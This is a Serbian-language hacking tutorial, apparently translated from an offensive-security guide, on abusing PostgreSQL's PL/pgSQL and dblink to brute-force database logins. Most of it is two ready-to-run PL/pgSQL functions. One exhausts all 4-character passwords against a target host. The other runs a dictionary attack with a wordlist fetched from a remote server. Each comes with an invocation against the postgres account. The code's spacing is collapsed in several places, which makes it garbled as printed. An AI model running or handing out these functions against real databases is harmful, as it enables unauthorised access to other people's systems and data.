PL/pgSQL je potpuno funkcionalan programski jezik koji proširuje mogućnosti SQL-a nudeći poboljšanu proceduralnu kontrolu. Ovo uključuje korišćenje petlji i raznih kontrolnih struktura. Funkcije napisane u PL/pgSQL jeziku mogu se pozivati SQL izjavama i okidačima, čime se proširuje opseg operacija unutar okruženja baze podataka.
Možete zloupotrebiti ovaj jezik kako biste tražili od PostgreSQL-a da izvrši brute-force napad na korisničke akreditive, ali mora postojati u bazi podataka. Možete proveriti njeno postojanje koristeći:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+---------plpgsql |
Podrazumevano, kreiranje funkcija je privilegija koja se dodeljuje PUBLIC-u, gde PUBLIC se odnosi na svakog korisnika u tom sistemu baze podataka. Da bi to sprečio, administrator je mogao da oduzme privilegiju USAGE iz PUBLIC domena:
REVOKE ALL PRIVILEGES ONLANGUAGE plpgsql FROM PUBLIC;
U tom slučaju, naš prethodni upit bi dao različite rezultate:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+-----------------plpgsql | {admin=U/admin}
Napomena da za sledeći skript da bi radio funkcija dblink mora postojati. Ako ne postoji, možete pokušati da je kreirate sa
CREATE EXTENSION dblink;
Bruteforce lozinke
Evo kako možete izvršiti bruteforce lozinke od 4 karaktera:
//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Napomena da čak i probijanje 4 karaktera može potrajati nekoliko minuta.
Takođe možete preuzeti rečnik i pokušati samo te lozinke (napad rečnikom):
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=1.2.3.4user=namepassword=qwertydbname=wordlists','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');